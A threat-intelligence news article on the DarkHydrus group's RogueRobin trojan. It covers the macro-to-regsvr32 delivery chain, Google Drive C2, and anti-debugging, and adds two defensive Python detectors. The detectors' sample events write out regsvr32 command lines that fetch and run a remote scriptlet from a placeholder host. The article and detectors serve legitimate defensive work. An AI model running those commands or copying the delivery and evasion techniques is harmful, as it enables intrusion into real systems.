New malicious campaigns attributed to the DarkHydrus APT group show the adversary using a new variant of the RogueRobin Trojan and Google Drive as an alternative command and control (C2) channel.
The group’s latest activity was observed against targets in the Middle East, luring them with Excel documents laced with malicious VBA code (macros).
For security reasons, macros are disabled by default in the Microsoft Office suite; the VBA code does not run unless the recipient manually enables it.
Recycling its malware
These attacks were first observed on January 9 by researchers at 360’s Threat Intelligence Center (360 TIC), who attributed them to DarkHydrus APT, the group Kaspersky Lab tracks as Lazy Meerkat.
The Chinese researchers noticed that the macro in the malicious documents downloads a .TXT file and then uses the legitimate, Microsoft-signed ‘regsvr32.exe’ utility to execute it; because that binary is a trusted part of Windows, the step can slip past application allowlisting that only checks the executable. After several more steps, a backdoor written in C# is dropped on the victim’s machine.
According to research from Palo Alto Networks’ Unit 42, the text file is in fact a Windows Script Component (.SCT) file that delivers a version of the RogueRobin trojan. The original RogueRobin payload was PowerShell-based; the threat actor appears to have ported it to a compiled (C#) variant.
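The delivery chain above (Office macro, downloaded .TXT that is really a scriptlet, regsvr32.exe used to run it) leaves a distinctive process-creation trail. The following detection logic is an added example written for this article, not code from 360 TIC, Unit 42 or the malware; it runs over constructed Sysmon-style event lines and flags regsvr32.exe when it is spawned by an Office process, handed a non-DLL or remote argument, or asked to load scrobj.dll. The exact regsvr32 switches and the scrobj.dll scriptlet host in the sample events are assumptions about how the .SCT would be invoked; the article only says regsvr32.exe is used to run the .TXT file.

```python
import re
import shlex
from typing import Dict, List, Optional

# Office hosts that have no business spawning a COM-registration utility.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}

# Constructed Sysmon-style process-creation events (hypothetical, not real
# telemetry from the campaign). Events 1 and 3 model the chain described in
# the article: an Office macro runs regsvr32.exe against a .txt scriptlet.
# The /i:<file> scrobj.dll invocation is an assumed, well-known form.
SAMPLE_EVENTS = [
    r"ParentImage=C:\Program Files\Microsoft Office\Office16\EXCEL.EXE "
    r"Image=C:\Windows\System32\regsvr32.exe "
    r"CommandLine=regsvr32.exe /s /u /i:C:\Users\victim\AppData\Local\Temp\update.txt scrobj.dll",
    r"ParentImage=C:\Windows\System32\msiexec.exe "
    r"Image=C:\Windows\System32\regsvr32.exe "
    r"CommandLine=regsvr32.exe /s C:\Windows\System32\vendorcomp.dll",
    r"ParentImage=C:\Program Files\Microsoft Office\Office16\WINWORD.EXE "
    r"Image=C:\Windows\System32\regsvr32.exe "
    r"CommandLine=regsvr32.exe /s /n /u /i:https://example.invalid/s.txt scrobj.dll",
    r"ParentImage=C:\Windows\explorer.exe "
    r"Image=C:\Windows\System32\notepad.exe "
    r"CommandLine=notepad.exe notes.txt",
]


def parse_event(line: str) -> Dict[str, str]:
    """Parse a flat key=value event line whose values may contain spaces."""
    return dict(re.findall(r"(\w+)=(.*?)(?=\s+\w+=|$)", line))


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def suspicious_regsvr32(event: Dict[str, str]) -> Optional[str]:
    """Return a reason string if the event looks like regsvr32 scriptlet abuse, else None."""
    if basename(event.get("Image", "")) != "regsvr32.exe":
        return None
    reasons: List[str] = []
    parent = basename(event.get("ParentImage", ""))
    if parent in OFFICE_PARENTS:
        reasons.append(f"spawned by Office process {parent}")
    # posix=False keeps Windows backslashes intact; drop argv[0] (regsvr32.exe itself).
    for tok in shlex.split(event.get("CommandLine", ""), posix=False)[1:]:
        tok = tok.strip('"')
        low = tok.lower()
        if low.startswith("/i:"):      # /i:<arg> is passed to DllInstall; scrobj.dll treats it as a scriptlet
            target = low[3:]
        elif low.startswith("/"):      # plain switches such as /s /u /n
            continue
        else:
            target = low
        if target.startswith(("http://", "https://")):
            reasons.append(f"remote scriptlet {tok}")
        elif basename(target) == "scrobj.dll":
            reasons.append("loads scrobj.dll (scriptlet host)")
        elif not target.endswith(".dll"):
            reasons.append(f"non-DLL argument {tok}")
    return "; ".join(reasons) if reasons else None


def scan(lines: List[str]) -> List[Dict[str, str]]:
    """Run the detector over raw event lines and return the hits."""
    hits: List[Dict[str, str]] = []
    for line in lines:
        ev = parse_event(line)
        why = suspicious_regsvr32(ev)
        if why:
            hits.append({"parent": basename(ev.get("ParentImage", "")),
                         "cmdline": ev.get("CommandLine", ""),
                         "reason": why})
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(hit)
```

The benign msiexec event (a real DLL, no Office parent) produces no hit, while both Office-spawned events are reported with every reason that fired, which is what an analyst wants when deciding whether the regsvr32 call was a macro dropper or a legitimate installer.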
Using Google Drive to deliver instructions
DarkHydrus compiled RogueRobin with an extra command that lets it use Google Drive as a secondary channel for receiving instructions.
The command is called ‘x_mode’ and is disabled by default; the adversary can turn it on over the DNS tunneling channel, which remains the main communication line with the C2 server.
Immediately after activation, the trojan receives a set of settings, stored in variables supplied with the ‘x_mode’ command, that let it exchange data through Google Drive: the URLs for downloading, uploading and updating files, and the authentication details.
RogueRobin then uploads a file to Google Drive and keeps polling it for changes; any modification of that file is interpreted as a command from the operator.
DarkHydrus sends regards
Both research teams observed that RogueRobin checks whether it is running in a sandbox environment.
In a report this week, Unit 42 writes that “in addition to checks for common analysis tools running on the system, the Trojan also checks to see if a debugger is attached to its processes and will exit if it detects the presence of a debugger.”
The researchers say RogueRobin uses DNS tunneling to talk to the C2 server and repeats the debugger check every time it issues a DNS query.
If a debugger is detected, the query is sent for a hex-encoded subdomain, 676f6f646c75636b.gogle[.]co, whose first label decodes to ‘goodluck.’
“This DNS query likely exists as a note to researchers or possibly as an anti-analysis measure, as it will only trigger if the researcher has already patched the initial debugger check to move onto the C2 function,” speculate the researchers.
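Both the ‘goodluck’ query and the DNS tunneling channel described above show up in resolver logs as hex-looking labels under a domain that collects an unusual number of unique names. The following analysis is an added example for this article, not code from Unit 42 or 360 TIC; it runs over constructed query-log lines (client, query name, type) that include the defanged gogle[.]co name from the report and a hypothetical evil-c2.invalid tunnel domain. Decoding hex labels, the eight-character minimum, the ‘last two labels’ notion of a parent domain and the five-name threshold are all assumptions chosen for the sample; a production detector would use the public suffix list and tune the threshold against its own baseline.

```python
import re
from collections import defaultdict
from typing import Dict, List, Optional, Set, Tuple

# Constructed resolver log lines: "<client> <qname> <qtype>". Hypothetical data;
# the gogle.co name is the article's defanged gogle[.]co, evil-c2.invalid is made up.
SAMPLE_QUERIES = [
    "10.0.0.5 www.example.com A",
    "10.0.0.5 mail.example.com A",
    "10.0.0.5 676f6f646c75636b.gogle.co A",          # label decodes to 'goodluck'
    "10.0.0.5 a3f19c0e77b2d4e1.evil-c2.invalid A",   # hex labels that carry binary data
    "10.0.0.5 b7c2e88d1f4a9e02.evil-c2.invalid A",
    "10.0.0.5 c91d3ab4e6f08a77.evil-c2.invalid A",
    "10.0.0.5 d4e5f6a7b8c9d0e1.evil-c2.invalid A",
    "10.0.0.5 e2a1b3c4d5f6a798.evil-c2.invalid A",
    "10.0.0.7 cdn.example.com A",
]

# An even-length run of hex digits; at least 8 characters to keep short
# legitimate words such as "cafe" or "dead" from matching.
HEX_LABEL = re.compile(r"^(?:[0-9a-f]{2}){4,}$")


def is_hex_label(label: str) -> bool:
    """True if the DNS label is entirely hex digits of even length (>= 8 chars)."""
    return HEX_LABEL.match(label.lower()) is not None


def decode_hex_label(label: str) -> Optional[str]:
    """Decode a hex label to printable ASCII (e.g. the 'goodluck' marker), else None.

    Tunnelled data will usually not decode to printable text; the label is still
    reported by is_hex_label in that case, only the plaintext is missing.
    """
    if not is_hex_label(label):
        return None
    try:
        text = bytes.fromhex(label).decode("ascii")
    except (ValueError, UnicodeDecodeError):
        return None
    return text if text.isprintable() else None


def analyze(lines: List[str], min_names: int = 5) -> Dict[str, object]:
    """Report hex-encoded labels and parent domains that collect many unique names."""
    hex_hits: List[Tuple[str, str, Optional[str]]] = []   # (client, qname, decoded)
    names_per_domain: Dict[str, Set[str]] = defaultdict(set)
    for line in lines:
        client, qname, _qtype = line.split()
        qname = qname.rstrip(".").lower()
        labels = qname.split(".")
        # Assumed simplification: parent domain = last two labels.
        domain = ".".join(labels[-2:])
        names_per_domain[domain].add(qname)
        for label in labels[:-2]:
            if is_hex_label(label):
                hex_hits.append((client, qname, decode_hex_label(label)))
    # Many distinct subdomains under one parent is the classic tunneling signal:
    # each query has to carry a fresh chunk of data in its name.
    tunnel_candidates = {d: len(n) for d, n in names_per_domain.items() if len(n) >= min_names}
    return {"hex_labels": hex_hits, "tunnel_candidates": tunnel_candidates}


if __name__ == "__main__":
    result = analyze(SAMPLE_QUERIES)
    for client, qname, decoded in result["hex_labels"]:
        print(f"{client} {qname} decoded={decoded!r}")
    print("tunnel candidates:", result["tunnel_candidates"])
```

On this sample the ‘goodluck’ marker is recovered as plaintext from the single gogle.co query, the five hex names under evil-c2.invalid are reported as hex labels without a printable decoding, and only evil-c2.invalid crosses the unique-name threshold, which is the combination an analyst would expect from a host that both tripped the debugger check and was talking to a DNS-tunneling C2.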
DarkHydrus was discovered by Palo Alto Networks’ Unit 42 team last summer in attacks against a government agency in the Middle East.
Costin Raiu, head of the GREAT (Global Research and Analysis Team) at Kaspersky Lab, described the actor as “sneaky” and “creative,” with an interest in the “Middle East, governments and aviation.”
DarkHydrus was also observed hunting for credentials from educational institutions in the same region. Unit 42 noticed such an attack as recently as June 24, 2018.